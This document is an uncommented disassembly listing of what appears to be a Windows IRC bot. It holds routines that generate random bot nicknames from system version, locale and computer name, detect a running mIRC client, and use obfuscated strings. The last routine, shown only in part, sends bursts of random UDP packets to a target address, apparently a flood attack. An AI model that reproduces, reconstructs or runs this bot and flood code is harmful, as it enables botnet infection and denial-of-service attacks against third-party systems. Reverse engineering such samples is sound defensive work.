cmp byte ptr [ecx+4], 0
jnz short loc_41D058
xor eax, eax
inc eax
jmp short loc_41D099
; ---------------------------------------------------------------------------
loc_41D058: ; CODE XREF: sub_41D04A+7�j
cmp [ebp+arg_8], 0
jnz short loc_41D07B
push [ebp+arg_4]
push [ebp+arg_0]
push offset aLcxMHdpwr1 ; "lCX/m/HdpWr1"
push offset dword_4476D8
push dword ptr [ecx]
push ecx
call sub_41C41E
add esp, 18h
jmp short loc_41D099
; ---------------------------------------------------------------------------
loc_41D07B: ; CODE XREF: sub_41D04A+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push offset aLcxMHdpwr1 ; "lCX/m/HdpWr1"
push offset dword_4476E4
push dword ptr [ecx]
push ecx
call sub_41C41E
add esp, 1Ch
loc_41D099: ; CODE XREF: sub_41D04A+C�j
; sub_41D04A+2F�j
pop ebp
retn 0Ch
sub_41D04A endp
; =============== S U B R O U T I N E =======================================
sub_41D09D proc near ; CODE XREF: sub_420BF0+57�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41D0A8
xor eax, eax
inc eax
jmp short locret_41D0B8
; ---------------------------------------------------------------------------
loc_41D0A8: ; CODE XREF: sub_41D09D+4�j
push 0
push [esp+4+arg_0]
push dword ptr [ecx+8]
call sub_41D04A
xor eax, eax
locret_41D0B8: ; CODE XREF: sub_41D09D+9�j
retn 4
sub_41D09D endp
; =============== S U B R O U T I N E =======================================
sub_41D0BB proc near ; CODE XREF: sub_418EDB+5E9�p
; sub_418EDB+5F5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov [ecx+24h], eax
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_41D0D1
call sub_41D252
jmp short loc_41D12F
; ---------------------------------------------------------------------------
loc_41D0D1: ; CODE XREF: sub_41D0BB+D�j
cmp eax, 1
jnz short loc_41D0DD
call sub_41D3AF
jmp short loc_41D12F
; ---------------------------------------------------------------------------
loc_41D0DD: ; CODE XREF: sub_41D0BB+19�j
cmp eax, 3
jnz short loc_41D0E9
call sub_41D1E5
jmp short loc_41D12F
; ---------------------------------------------------------------------------
loc_41D0E9: ; CODE XREF: sub_41D0BB+25�j
cmp eax, 4
jnz short loc_41D0F5
call sub_41D17C
jmp short loc_41D12F
; ---------------------------------------------------------------------------
loc_41D0F5: ; CODE XREF: sub_41D0BB+31�j
cmp eax, 2
jz short loc_41D12A
cmp eax, 5
jnz short loc_41D106
call sub_41D529
jmp short loc_41D12F
; ---------------------------------------------------------------------------
loc_41D106: ; CODE XREF: sub_41D0BB+42�j
cmp eax, 6
jnz short loc_41D112
call sub_41D5E0
jmp short loc_41D12F
; ---------------------------------------------------------------------------
loc_41D112: ; CODE XREF: sub_41D0BB+4E�j
cmp eax, 7
jnz short loc_41D11E
call sub_41D70C
jmp short loc_41D12F
; ---------------------------------------------------------------------------
loc_41D11E: ; CODE XREF: sub_41D0BB+5A�j
cmp eax, 8
jnz short loc_41D12A
call sub_41D851
jmp short loc_41D12F
; ---------------------------------------------------------------------------
loc_41D12A: ; CODE XREF: sub_41D0BB+3D�j
; sub_41D0BB+66�j
call sub_41D137
loc_41D12F: ; CODE XREF: sub_41D0BB+14�j
; sub_41D0BB+20�j ...
mov dword_458428, eax
retn 8
sub_41D0BB endp
; =============== S U B R O U T I N E =======================================
sub_41D137 proc near ; CODE XREF: sub_41D0BB:loc_41D12A�p
push ebx
push esi
push edi
push 10h
mov ebx, offset byte_45844C
push 0
push ebx
mov edi, ecx
call sub_429690
xor esi, esi
add esp, 0Ch
cmp [edi+24h], esi
jl short loc_41D16F
loc_41D155: ; CODE XREF: sub_41D137+36�j
call sub_429ACC
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov byte_45844C[esi], dl
inc esi
cmp esi, [edi+24h]
jle short loc_41D155
loc_41D16F: ; CODE XREF: sub_41D137+1C�j
and byte_45844C[esi], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41D137 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D17C proc near ; CODE XREF: sub_41D0BB+33�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push 10h
mov esi, offset byte_45842C
push ebx
push esi
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
push esi
call dword_456F70 ; GetComputerNameA
movsx eax, byte_45842C
push 41h
pop ecx
loc_41D1B1: ; CODE XREF: sub_41D17C+40�j
cmp eax, ecx
jnz short loc_41D1B8
xor ebx, ebx
inc ebx
loc_41D1B8: ; CODE XREF: sub_41D17C+37�j
inc ecx
cmp ecx, 5Bh
jl short loc_41D1B1
push 61h
pop ecx
loc_41D1C1: ; CODE XREF: sub_41D17C+50�j
cmp eax, ecx
jnz short loc_41D1C8
xor ebx, ebx
inc ebx
loc_41D1C8: ; CODE XREF: sub_41D17C+47�j
inc ecx
cmp ecx, 7Bh
jl short loc_41D1C1
test ebx, ebx
jnz short loc_41D1DF
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push esi
call sub_429A33
pop ecx
pop ecx
loc_41D1DF: ; CODE XREF: sub_41D17C+54�j
mov eax, esi
pop esi
pop ebx
leave
retn
sub_41D17C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D1E5 proc near ; CODE XREF: sub_41D0BB+27�p
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push 10h
mov esi, offset byte_4583F8
push 0
push esi
mov ebx, ecx
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_10]
push 10h
push eax
push 7
push 800h
call dword_4370E8 ; GetLocaleInfoA
lea eax, [ebp+var_10]
push eax
push offset dword_4476F4
push esi
call sub_429A33
push esi
call sub_4292D0
add esp, 10h
mov edi, eax
jmp short loc_41D246
; ---------------------------------------------------------------------------
loc_41D231: ; CODE XREF: sub_41D1E5+64�j
call sub_429ACC
push 0Ah
cdq
pop ecx
idiv ecx
add dl, 30h
mov byte_4583F8[edi], dl
inc edi
loc_41D246: ; CODE XREF: sub_41D1E5+4A�j
cmp edi, [ebx+24h]
jle short loc_41D231
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_41D1E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D252 proc near ; CODE XREF: sub_41D0BB+F�p
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_90 = dword ptr -90h
var_6 = byte ptr -6
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0A0h
push ebx
push esi
push edi
push 10h
mov edi, offset byte_45845C
push 0
push edi
mov [ebp+var_4], ecx
mov esi, offset off_4476F8
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_A0]
mov [ebp+var_A0], 9Ch
push eax
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_41D377
push [ebp+var_98]
push [ebp+var_9C]
push offset aD_D ; "%d.%d"
push 4
push esi
call sub_429AEE
add esp, 14h
cmp [ebp+var_9C], 4
jnz short loc_41D30A
cmp [ebp+var_98], 0
jnz short loc_41D2EA
cmp [ebp+var_90], 1
jnz short loc_41D2D3
mov esi, offset a95 ; "95"
loc_41D2D3: ; CODE XREF: sub_41D252+7A�j
cmp [ebp+var_90], 2
jnz loc_41D377
mov esi, offset aNt_0 ; "NT"
jmp loc_41D377
; ---------------------------------------------------------------------------
loc_41D2EA: ; CODE XREF: sub_41D252+71�j
cmp [ebp+var_98], 0Ah
jnz short loc_41D2FA
mov esi, offset a98 ; "98"
jmp short loc_41D377
; ---------------------------------------------------------------------------
loc_41D2FA: ; CODE XREF: sub_41D252+9F�j
cmp [ebp+var_98], 5Ah
jnz short loc_41D377
mov esi, offset aMe_0 ; "ME"
jmp short loc_41D377
; ---------------------------------------------------------------------------
loc_41D30A: ; CODE XREF: sub_41D252+68�j
cmp [ebp+var_9C], 5
jnz short loc_41D343
cmp [ebp+var_98], 0
jnz short loc_41D323
mov esi, offset a2k ; "2K"
jmp short loc_41D377
; ---------------------------------------------------------------------------
loc_41D323: ; CODE XREF: sub_41D252+C8�j
cmp [ebp+var_98], 1
jnz short loc_41D333
mov esi, offset aXp ; "XP"
jmp short loc_41D377
; ---------------------------------------------------------------------------
loc_41D333: ; CODE XREF: sub_41D252+D8�j
cmp [ebp+var_98], 2
jnz short loc_41D377
mov esi, offset a2k3_0 ; "2K3"
jmp short loc_41D377
; ---------------------------------------------------------------------------
loc_41D343: ; CODE XREF: sub_41D252+BF�j
cmp [ebp+var_9C], 6
jnz short loc_41D377
cmp [ebp+var_98], 0
jnz short loc_41D369
cmp [ebp+var_6], 1
jnz short loc_41D362
mov esi, offset aVista_0 ; "Vista"
jmp short loc_41D377
; ---------------------------------------------------------------------------
loc_41D362: ; CODE XREF: sub_41D252+107�j
mov esi, offset a2k8 ; "2K8"
jmp short loc_41D377
; ---------------------------------------------------------------------------
loc_41D369: ; CODE XREF: sub_41D252+101�j
cmp [ebp+var_98], 1
jnz short loc_41D377
mov esi, offset a7 ; "7"
loc_41D377: ; CODE XREF: sub_41D252+3F�j
; sub_41D252+88�j ...
push esi
push edi
call sub_429A33
push edi
call sub_4292D0
mov ebx, [ebp+var_4]
add esp, 0Ch
mov esi, eax
jmp short loc_41D3A3
; ---------------------------------------------------------------------------
loc_41D38E: ; CODE XREF: sub_41D252+154�j
call sub_429ACC
push 0Ah
cdq
pop ecx
idiv ecx
add dl, 30h
mov byte_45845C[esi], dl
inc esi
loc_41D3A3: ; CODE XREF: sub_41D252+13A�j
cmp esi, [ebx+24h]
jle short loc_41D38E
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_41D252 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D3AF proc near ; CODE XREF: sub_41D0BB+1B�p
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_9C = dword ptr -9Ch
var_12 = byte ptr -12h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 0ACh
push esi
push edi
push 10h
mov edi, offset dword_45846C
push 0
push edi
mov esi, offset off_4476F8
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_10]
push 10h
push eax
push 7
push 800h
call dword_4370E8 ; GetLocaleInfoA
lea eax, [ebp+var_AC]
mov [ebp+var_AC], 9Ch
push eax
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_41D4E3
push [ebp+var_A4]
push [ebp+var_A8]
push offset aD_D ; "%d.%d"
push 4
push esi
call sub_429AEE
add esp, 14h
cmp [ebp+var_A8], 4
jnz short loc_41D476
cmp [ebp+var_A4], 0
jnz short loc_41D456
cmp [ebp+var_9C], 1
jnz short loc_41D43F
mov esi, offset a95 ; "95"
loc_41D43F: ; CODE XREF: sub_41D3AF+89�j
cmp [ebp+var_9C], 2
jnz loc_41D4E3
mov esi, offset aNt_0 ; "NT"
jmp loc_41D4E3
; ---------------------------------------------------------------------------
loc_41D456: ; CODE XREF: sub_41D3AF+80�j
cmp [ebp+var_A4], 0Ah
jnz short loc_41D466
mov esi, offset a98 ; "98"
jmp short loc_41D4E3
; ---------------------------------------------------------------------------
loc_41D466: ; CODE XREF: sub_41D3AF+AE�j
cmp [ebp+var_A4], 5Ah
jnz short loc_41D4E3
mov esi, offset aMe_0 ; "ME"
jmp short loc_41D4E3
; ---------------------------------------------------------------------------
loc_41D476: ; CODE XREF: sub_41D3AF+77�j
cmp [ebp+var_A8], 5
jnz short loc_41D4AF
cmp [ebp+var_A4], 0
jnz short loc_41D48F
mov esi, offset a2k ; "2K"
jmp short loc_41D4E3
; ---------------------------------------------------------------------------
loc_41D48F: ; CODE XREF: sub_41D3AF+D7�j
cmp [ebp+var_A4], 1
jnz short loc_41D49F
mov esi, offset aXp ; "XP"
jmp short loc_41D4E3
; ---------------------------------------------------------------------------
loc_41D49F: ; CODE XREF: sub_41D3AF+E7�j
cmp [ebp+var_A4], 2
jnz short loc_41D4E3
mov esi, offset a2k3_0 ; "2K3"
jmp short loc_41D4E3
; ---------------------------------------------------------------------------
loc_41D4AF: ; CODE XREF: sub_41D3AF+CE�j
cmp [ebp+var_A8], 6
jnz short loc_41D4E3
cmp [ebp+var_A4], 0
jnz short loc_41D4D5
cmp [ebp+var_12], 1
jnz short loc_41D4CE
mov esi, offset aVista_0 ; "Vista"
jmp short loc_41D4E3
; ---------------------------------------------------------------------------
loc_41D4CE: ; CODE XREF: sub_41D3AF+116�j
mov esi, offset a2k8 ; "2K8"
jmp short loc_41D4E3
; ---------------------------------------------------------------------------
loc_41D4D5: ; CODE XREF: sub_41D3AF+110�j
cmp [ebp+var_A4], 1
jnz short loc_41D4E3
mov esi, offset a7 ; "7"
loc_41D4E3: ; CODE XREF: sub_41D3AF+4E�j
; sub_41D3AF+97�j ...
call sub_429ACC
push 0Ah
cdq
pop ecx
idiv ecx
add edx, 30h
push edx
call sub_429ACC
push 0Ah
cdq
pop ecx
idiv ecx
add edx, 30h
push edx
call sub_429ACC
push 0Ah
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_10]
add edx, 30h
push edx
push esi
push eax
push offset dword_4476FC
push edi
call sub_429A33
add esp, 1Ch
mov eax, edi
pop edi
pop esi
leave
retn
sub_41D3AF endp
; =============== S U B R O U T I N E =======================================
sub_41D529 proc near ; CODE XREF: sub_41D0BB+44�p
var_12 = byte ptr -12h
var_10 = byte ptr -10h
sub esp, 14h
push ebx
push ebp
push esi
push edi
xor ebp, ebp
push 10h
mov edi, offset dword_45847C
push ebp
push edi
mov esi, ecx
call sub_429690
add esp, 0Ch
mov ecx, esi
mov [esi+2Ch], ebp
mov [esi+30h], ebp
mov [esi+38h], ebp
call sub_41D94F
mov ebx, eax
lea eax, [esp+24h+var_10]
push 10h
push eax
push 7
push 800h
call dword_4370E8 ; GetLocaleInfoA
push ebx
mov ebx, dword_437090
push edi
call ebx ; dword_437090
lea eax, [esp+24h+var_10]
push eax
push edi
call ebx ; dword_437090
push offset dword_447710
push edi
call ebx ; dword_437090
xor eax, eax
inc eax
cmp [esi+2Ch], ebp
jz short loc_41D590
push 2
pop eax
loc_41D590: ; CODE XREF: sub_41D529+62�j
cmp [esi+30h], ebp
jz short loc_41D596
inc eax
loc_41D596: ; CODE XREF: sub_41D529+6A�j
cmp [esi+38h], ebp
jz short loc_41D59C
inc eax
loc_41D59C: ; CODE XREF: sub_41D529+70�j
push 5
pop esi
cmp eax, esi
jge short loc_41D5CE
sub esi, eax
loc_41D5A5: ; CODE XREF: sub_41D529+A3�j
call sub_429ACC
push 0Ah
cdq
pop ecx
idiv ecx
lea eax, [esp+24h+var_12]
push edx
push offset dword_44770C
push eax
call sub_429A33
add esp, 0Ch
lea eax, [esp+24h+var_12]
push eax
push edi
call ebx ; dword_437090
dec esi
jnz short loc_41D5A5
loc_41D5CE: ; CODE XREF: sub_41D529+78�j
push offset dword_447710
push edi
call ebx ; dword_437090
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
sub_41D529 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D5E0 proc near ; CODE XREF: sub_41D0BB+50�p
var_4C = byte ptr -4Ch
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 10h
mov ebx, offset dword_458408
push 0
push ebx
call sub_429690
add esp, 0Ch
call dword_437184 ; GetTickCount
push eax
call sub_41BA39
pop ecx
mov [ebp+var_C], eax
call sub_429ACC
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
cdq
pop ecx
lea edi, [ebp+var_4C]
idiv ecx
push 0Fh
pop ecx
rep movsd
movsw
movsb
add dl, 61h
mov [ebp+var_8], dl
call sub_429ACC
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_7], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_6], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_5], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_4], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_3], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_2], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_1], al
call sub_429ACC
cdq
idiv esi
mov dl, [ebp+edx+var_4C]
movsx eax, dl
push eax
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
cmp [ebp+var_C], 5
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
movsx eax, [ebp+var_7]
push eax
movsx eax, [ebp+var_8]
push eax
jbe short loc_41D6F7
push [ebp+var_C]
push offset aDCCCCCCCCC ; "|%d|%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429A33
add esp, 30h
jmp short loc_41D705
; ---------------------------------------------------------------------------
loc_41D6F7: ; CODE XREF: sub_41D5E0+102�j
push offset aCCCCCCCCC ; "%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429A33
add esp, 2Ch
loc_41D705: ; CODE XREF: sub_41D5E0+115�j
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_41D5E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D70C proc near ; CODE XREF: sub_41D0BB+5C�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
push 10h
mov ebx, offset dword_45843C
push 0
push ebx
mov [ebp+var_14], ecx
call sub_429690
add esp, 0Ch
call dword_437184 ; GetTickCount
push eax
call sub_41BA39
pop ecx
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
call sub_41DA00
mov [ebp+var_10], eax
call sub_429ACC
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
cdq
pop ecx
lea edi, [ebp+var_54]
idiv ecx
push 0Fh
pop ecx
rep movsd
movsw
movsb
add dl, 61h
mov [ebp+var_8], dl
call sub_429ACC
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_7], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_6], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_5], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_4], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_3], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_2], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_1], al
call sub_429ACC
cdq
idiv esi
mov dl, [ebp+edx+var_54]
movsx eax, dl
push eax
cmp [ebp+var_C], 5
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
movsx eax, [ebp+var_7]
push eax
movsx eax, [ebp+var_8]
push eax
push [ebp+var_10]
jbe short loc_41D834
push [ebp+var_C]
push offset aDSCCCCCCCCC ; "|%d|%s%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429A33
add esp, 34h
jmp short loc_41D842
; ---------------------------------------------------------------------------
loc_41D834: ; CODE XREF: sub_41D70C+113�j
push offset aSCCCCCCCCC ; "%s%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429A33
add esp, 30h
loc_41D842: ; CODE XREF: sub_41D70C+126�j
mov ecx, [ebp+var_14]
call sub_41D94F
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_41D70C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D851 proc near ; CODE XREF: sub_41D0BB+68�p
var_48 = byte ptr -48h
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 10h
mov ebx, offset dword_458418
push 0
push ebx
call sub_429690
call sub_429ACC
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
cdq
pop ecx
lea edi, [ebp+var_48]
idiv ecx
push 0Fh
pop ecx
rep movsd
movsw
movsb
add dl, 61h
mov [ebp+var_8], dl
call sub_429ACC
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_7], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_6], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_5], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_4], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_3], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_2], al
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_1], al
call sub_429ACC
cdq
idiv esi
movsx eax, [ebp+edx+var_48]
push eax
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
movsx eax, [ebp+var_7]
push eax
movsx eax, [ebp+var_8]
push eax
push offset aCCCCCCCCC ; "%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429A33
add esp, 38h
mov eax, ebx
pop edi
pop esi
pop ebx
leave
retn
sub_41D851 endp
; =============== S U B R O U T I N E =======================================
sub_41D94F proc near ; CODE XREF: sub_41D529+27�p
; sub_41D70C+139�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
sub esp, 0Ch
push ebx
push ebp
push esi
push edi
push 10h
mov esi, offset dword_4583D8
push 0
push esi
mov ebx, ecx
call sub_429690
add esp, 0Ch
call dword_437184 ; GetTickCount
push eax
call sub_41BA39
mov ebp, offset dword_447710
mov [esp+20h+var_C], eax
push ebp
push esi
call sub_429A33
add esp, 0Ch
push 0
push offset aMirc ; "mIRC"
call dword_456F24 ; FindWindowA
mov edi, dword_437090
test eax, eax
jz short loc_41D9AF
push offset aM ; "M"
push esi
mov dword ptr [ebx+2Ch], 1
call edi ; dword_437090
loc_41D9AF: ; CODE XREF: sub_41D94F+4F�j
push offset dword_457CD8
call sub_41E3FB
test eax, eax
pop ecx
jz short loc_41D9CD
push offset aP ; "P"
push esi
mov dword ptr [ebx+30h], 1
call edi ; dword_437090
loc_41D9CD: ; CODE XREF: sub_41D94F+6D�j
push [esp+1Ch+var_C]
lea eax, [esp+20h+var_8]
push offset a_2d ; "%.2d"
push eax
call sub_429A33
mov eax, [esp+28h+var_C]
add esp, 0Ch
mov [ebx+28h], eax
lea eax, [esp+1Ch+var_8]
push eax
push esi
call edi ; dword_437090
push ebp
push esi
call edi ; dword_437090
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_41D94F endp
; =============== S U B R O U T I N E =======================================
sub_41DA00 proc near ; CODE XREF: sub_41D70C+31�p
push ebx
push ebp
push esi
push edi
push 10h
mov esi, offset dword_4583E8
push 0
push esi
mov edi, ecx
call sub_429690
add esp, 0Ch
call dword_437184 ; GetTickCount
push eax
call sub_41BA39
pop ecx
push 0
push offset aMirc ; "mIRC"
call dword_456F24 ; FindWindowA
mov ebx, dword_437090
xor ebp, ebp
inc ebp
test eax, eax
jz short loc_41DA4A
push offset aM_0 ; "M|"
push esi
mov [edi+2Ch], ebp
call ebx ; dword_437090
loc_41DA4A: ; CODE XREF: sub_41DA00+3D�j
push offset dword_457CD8
call sub_41E3FB
test eax, eax
pop ecx
jz short loc_41DA64
push offset aP_0 ; "P|"
push esi
mov [edi+30h], ebp
call ebx ; dword_437090
loc_41DA64: ; CODE XREF: sub_41DA00+57�j
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41DA00 endp
; =============== S U B R O U T I N E =======================================
sub_41DA6B proc near ; CODE XREF: sub_420CAE+12�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41DA76
xor eax, eax
inc eax
jmp short locret_41DA8F
; ---------------------------------------------------------------------------
loc_41DA76: ; CODE XREF: sub_41DA6B+4�j
push [esp+arg_0]
push offset aTugnf_mqsdr0_0 ; "TuGNF.mQSDR0"
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_41C41E
add esp, 14h
locret_41DA8F: ; CODE XREF: sub_41DA6B+9�j
retn 4
sub_41DA6B endp
; =============== S U B R O U T I N E =======================================
sub_41DA92 proc near ; CODE XREF: sub_40A938+794�p
; sub_40A938+231A�p ...
mov eax, [ecx+8]
retn
sub_41DA92 endp
; =============== S U B R O U T I N E =======================================
sub_41DA96 proc near ; CODE XREF: sub_40A938+7B1�p
; sub_40A938+8768�p ...
mov eax, [ecx+0Ch]
retn
sub_41DA96 endp
; =============== S U B R O U T I N E =======================================
sub_41DA9A proc near ; CODE XREF: sub_418EDB+5BD�p
; sub_421F40+DF�p ...
mov al, [ecx+4]
retn
sub_41DA9A endp
; =============== S U B R O U T I N E =======================================
sub_41DA9E proc near ; CODE XREF: sub_418EDB+64B�p
mov al, [ecx+5]
retn
sub_41DA9E endp
; =============== S U B R O U T I N E =======================================
sub_41DAA2 proc near ; CODE XREF: sub_40A938+6195�p
; sub_40A938+9991�p
mov eax, [ecx]
retn
sub_41DAA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DAA5 proc near ; DATA XREF: sub_40A938+6FF6�o
var_150 = dword ptr -150h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 150h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov dword ptr [eax+12Ch], 1
mov eax, [ebp+var_150]
xor esi, esi
mov [ebp+var_8], eax
push esi
mov [ebp+arg_0], esi
call sub_42A705
push 32h
mov [ebp+var_10], eax
call sub_4296E8
pop ecx
cmp eax, esi
pop ecx
mov [ebp+var_4], eax
jz loc_41DBC7
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_C8]
push eax
call dword_4372BC ; inet_addr
push [ebp+var_3C]
mov [ebp+var_1C], eax
mov [ebp+var_20], 2
call dword_4372C0 ; ntohs
mov ebx, dword_4372D4
mov [ebp+var_1E], ax
loc_41DB2E: ; CODE XREF: sub_41DAA5+111�j
xor edi, edi
cmp [ebp+var_3C], edi
jnz short loc_41DB3E
call sub_429ACC
mov [ebp+var_1E], ax
loc_41DB3E: ; CODE XREF: sub_41DAA5+8E�j
push 11h
push 2
push 2
call dword_4372B8 ; socket
mov esi, eax
cmp esi, edi
jl short loc_41DBBB
lea eax, [ebp+var_C]
mov [ebp+var_C], 1
push eax
push 8004667Eh
push esi
call dword_43728C ; ioctlsocket
loc_41DB67: ; CODE XREF: sub_41DAA5+D1�j
call sub_429ACC
mov ecx, [ebp+var_4]
mov [edi+ecx], al
inc edi
cmp edi, 32h
jb short loc_41DB67
lea eax, [ebp+var_20]
push 10h
xor edi, edi
push eax
push edi
push 32h
push ecx
push esi
call dword_437290 ; sendto
push esi
call ebx ; dword_4372D4
cmp [ebp+arg_0], 32h
jb short loc_41DBAA
push edi
call sub_42A705
mov edx, [ebp+var_10]
pop ecx
mov ecx, [ebp+var_38]
add ecx, edx
cmp eax, ecx
jge short loc_41DBD0
mov [ebp+arg_0], edi
loc_41DBAA: ; CODE XREF: sub_41DAA5+ED�j
push [ebp+var_40]
